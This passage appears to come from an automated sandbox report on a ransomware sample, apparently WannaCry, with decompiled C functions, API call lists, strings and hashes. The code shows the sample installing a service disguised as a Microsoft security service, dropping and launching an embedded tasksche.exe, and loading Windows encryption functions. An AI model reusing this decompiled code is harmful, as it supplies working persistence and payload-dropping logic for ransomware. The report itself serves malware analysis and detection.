InternetCloseHandle.WININET(00000000), ref: 004081A7
InternetCloseHandle.WININET(00000000), ref: 004081AB

Memory Dump Source

Source File: 00000001.00000002.579707535.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.579702659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579719630.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579778869.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579787871.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$CloseHandleOpen
String ID:
API String ID: 435140893-0
Opcode ID: 7bc602e844cdf910e4a24fc0389d75e4e4c0db4e5e0cdfe1b8e612c3f784a296
Instruction ID: 1dd4d323c29996ceece3d10fb5d3e331cb9ed4e1cabd62d72b2cd6c3d10c6962
Opcode Fuzzy Hash: 7bc602e844cdf910e4a24fc0389d75e4e4c0db4e5e0cdfe1b8e612c3f784a296
Instruction Fuzzy Hash: 050162715443106EE320DF648D01B6B7BE9EF85710F01082EF984E7280EAB59804876B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}

0x00407c56
0x00407c6e
0x00407c72
0x00407cd3
0x00407c74
0x00407ca7
0x00407cab
0x00407cb2
0x00407cb9
0x00407cb9
0x00407cbc
0x00407cc9
0x00407cc9

APIs

sprintf.MSVCRT ref: 00407C56
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F76FB10,00000000), ref: 00407C9B
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC

Strings

mssecsvc2.0, xrefs: 00407C95
%s -m security, xrefs: 00407C50
Microsoft Security Center (2.0) Service, xrefs: 00407C90

Memory Dump Source

Source File: 00000001.00000002.579707535.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.579702659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579719630.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579778869.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579787871.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
API String ID: 3340711343-4063779371
Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF

Uniqueness

Uniqueness Score: -1.00%

Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				char _v572;
				short _v592;
				intOrPtr _v596;
				void* _v608;
				void _v636;
				char _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				intOrPtr _v692;
				intOrPtr _v700;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				intOrPtr _t64;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					_t64 =  *0x431478; // 0x0
					 *0x43144c = _t36;
					if(_t64 != 0) {
						_t121 =  *0x431458; // 0x0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x0
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1);
												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
												if(_t107 != 0xffffffff) {
													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
													 *0x43144c(_t107);
													_v652 = 0;
													_v648 = 0;
													_v644 = 0;
													memset( &_v636, 0, 0x10 << 2);
													asm("repne scasb");
													_v656 = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v572 - 1, _t108, 0 << 2);
													_push( &_v656);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_push( &_v640);
													_push(0);
													_push(0);
													_push(0x8000000);
													_push(0);
													_push(0);
													_push(0);
													_push( &_v572);
													_push(0);
													_v640 = 0x44;
													_v592 = 0;
													_v596 = 0x81;
													if( *0x431478() != 0) {
														 *0x43144c(_v692);
														 *0x43144c(_v700);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}

0x00407cf5
0x00407cfb
0x00407d15
0x00407d22
0x00407d2f
0x00407d34
0x00407d36
0x00407d3c
0x00407d43
0x00407d49
0x00407d4f
0x00407d55
0x00407d5b
0x00407d7a
0x00407d7e
0x00407d86
0x00407d8e
0x00407d95
0x00407d9d
0x00407da1
0x00407daf
0x00407db3
0x00407dc4
0x00407dc8
0x00407dca
0x00407dcc
0x00407ddb
0x00407de2
0x00407def
0x00407df1
0x00407e01
0x00407e18
0x00407e2c
0x00407e49
0x00407e4e
0x00407e61
0x00407e68
0x00407e72
0x00407e7a
0x00407e82
0x00407e8b
0x00407e95
0x00407e9b
0x00407e9f
0x00407ea8
0x00407eb0
0x00407ebb
0x00407ebc
0x00407ec6
0x00407ec7
0x00407ec8
0x00407ec9
0x00407ece
0x00407ecf
0x00407ed0
0x00407ed1
0x00407ed2
0x00407ed3
0x00407edb
0x00407ee0
0x00407ef0
0x00407ef7
0x00407f02
0x00407f02
0x00407ef0
0x00407e4e
0x00407db3
0x00407da1
0x00407d8e
0x00407d7e
0x00407d5b
0x00407d4f
0x00407d43
0x00407f14

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F76FB10,?,00000000), ref: 00407CEF
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
sprintf.MSVCRT ref: 00407E01
sprintf.MSVCRT ref: 00407E18
MoveFileExA.KERNEL32 ref: 00407E2C

Strings

/i, xrefs: 00407E8D
C:\%s\qeriuwjhrf, xrefs: 00407E12
CloseHandle, xrefs: 00407D29
WriteFile, xrefs: 00407D1C
WINDOWS, xrefs: 00407DF2, 00407E0D
kernel32.dll, xrefs: 00407CEA
CreateFileA, xrefs: 00407D0F
tasksche.exe, xrefs: 00407DEA
C:\%s\%s, xrefs: 00407DFB
CreateProcessA, xrefs: 00407D07
D, xrefs: 00407ED3

Memory Dump Source

Source File: 00000001.00000002.579707535.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.579702659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579719630.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579724785.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579778869.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579787871.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
API String ID: 4072214828-1507730452
Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tasksche.exePID: 4608, Parent PID: 3644COMMON

Non-executed Functions

Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}

0x00406c40
0x00406c40
0x00406c4c
0x00406c4f
0x00406c52
0x00406c56
0x00406c59
0x00407064
0x00000000
0x00407064
0x00406c5f
0x00406c64
0x00000000
0x00000000
0x00406c6d
0x00406c70
0x00406c75
0x00406c75
0x00406c7c
0x00406c7f
0x00406ca0
0x00406cec
0x00406cf1
0x00406cfa
0x00406cfa
0x00406cff
0x00406d21
0x00406d3e
0x00406d52
0x00406d5c
0x00406d89
0x00000000
0x00406d89
0x00406d5e
0x00406d61
0x00406d68
0x00406d7e
0x00406d95
0x00406d9b
0x00406dab
0x00406db0
0x00406db8
0x00406dbe
0x00406dbe
0x00406dbe
0x00406dc2
0x00000000
0x00000000
0x00406dd0
0x00406dd6
0x00000000
0x00406dd9
0x00406ddf
0x00406de5
0x00406e11
0x00406e11
0x00406e11
0x00000000
0x00406e11
0x00406ded
0x00406df3
0x00000000
0x00000000
0x00406dfb
0x00406e01
0x00000000
0x00000000
0x00406e09
0x00406e0f
0x00406e1b
0x00406e20
0x00406e28
0x00406e2c
0x00406e3c
0x00406e3e
0x00406e41
0x00406e44
0x00406e46
0x00406e61
0x00406e6b
0x00406e6d
0x00406e78
0x00406e7a
0x00406e7c
0x00406e7c
0x00406e7e
0x00406e82
0x00406e88
0x00406e8a
0x00406e8a
0x00406e96
0x00406e98
0x00406e98
0x00406ea3
0x00406ea5
0x00406ea5
0x00406eae
0x00406eb0
0x00406eb0
0x00406ebb
0x00406ebd
0x00406ebd
0x00406eca
0x00406ed3
0x00406ee6
0x00406ef2
0x00406ef5
0x00406efb
0x00406efe
0x00406f05
0x00406f08
0x00406f0e
0x00406f14
0x00406f1a
0x00406f20
0x00406f26
0x00406f2c
0x00407037
0x00407039
0x0040703b
0x0040703c
0x00407041
0x00407048
0x0040704f
0x0040705a
0x00000000
0x00406f32
0x00406f32
0x00406f3a
0x00406f41
0x00406f45
0x00406f4d
0x00406f5d
0x00000000
0x00000000
0x00406f62
0x00406f6c
0x00000000
0x00000000
0x00000000
0x00406f6e
0x00406f73
0x00406f81
0x00406f86
0x00406f89
0x00406f8f
0x00406f92
0x00406f94
0x00406f99
0x00406f9e
0x00406fba
0x00406fc0
0x00406fc4
0x00406fc4
0x00406fcc
0x00406fce
0x00406fd3
0x00406fd8
0x00406ff4
0x00406ffb
0x00406ffb
0x00407005
0x00407007
0x0040702a
0x00407031
0x00407031
0x00000000
0x00407005
0x00406f2c
0x00000000
0x00406e0f
0x00406dd0
0x00406dcb
0x00000000
0x00406dcb
0x00406d80
0x00406d83
0x00000000
0x00406d88
0x00000000
0x00406d40
0x00406d02
0x00406cf9
0x00406cf9
0x00000000
0x00406cf9
0x00406cf4
0x00000000
0x00406cf4
0x00000000
0x00406c81
0x00406c83
0x00406ca2
0x00406ca7
0x00406caa
0x00406cae
0x00406cb1
0x00406cb7
0x00406cbd
0x00406cc3
0x00406cc9
0x00406ccf
0x00406cd5
0x00406cdb
0x00406ce1
0x00407060
0x00000000
0x00407060
0x00406c91
0x00000000
0x00406c96

APIs

memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91

Strings

/..\, xrefs: 00406E03
/../, xrefs: 00406DF5
\../, xrefs: 00406DE7
\..\, xrefs: 00406DD9

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: memcpy
String ID: /../$/..\$\../$\..\
API String ID: 3510742995-3885502717
Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}

0x00401a48
0x00401a4f
0x00401aec
0x00401aee
0x00000000
0x00401aee
0x00401a60
0x00401a64
0x00401af1
0x00000000
0x00401af1
0x00401a7f
0x00401a8c
0x00401a99
0x00401aa6
0x00401ab3
0x00401ab8
0x00401aba
0x00401ac0
0x00401ac6
0x00000000
0x00000000
0x00401ac8
0x00401ace
0x00000000
0x00000000
0x00401ad0
0x00401ad6
0x00000000
0x00000000
0x00401ad8
0x00401ade
0x00000000
0x00000000
0x00401ae0
0x00401ae6
0x00000000
0x00000000
0x00000000
0x00000000

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8

Strings

CryptGenKey, xrefs: 00401AAD
CryptEncrypt, xrefs: 00401A93
CryptDestroyKey, xrefs: 00401A86
CryptDecrypt, xrefs: 00401AA0
advapi32.dll, xrefs: 00401A55
CryptAcquireContextA, xrefs: 00401A71
CryptImportKey, xrefs: 00401A79

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
API String ID: 2238633743-2459060434
Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}

0x00401cfb
0x00401cfe
0x00401d06
0x00401d09
0x00401d21
0x00401d29
0x00401d2c
0x00401d54
0x00401d7b
0x00401d7f
0x00401d84
0x00401d8b
0x00401d91
0x00401d91
0x00401d98
0x00401d2e
0x00401d31
0x00401d3a
0x00401d42
0x00401d42
0x00401d9e
0x00000000
0x00401da7
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
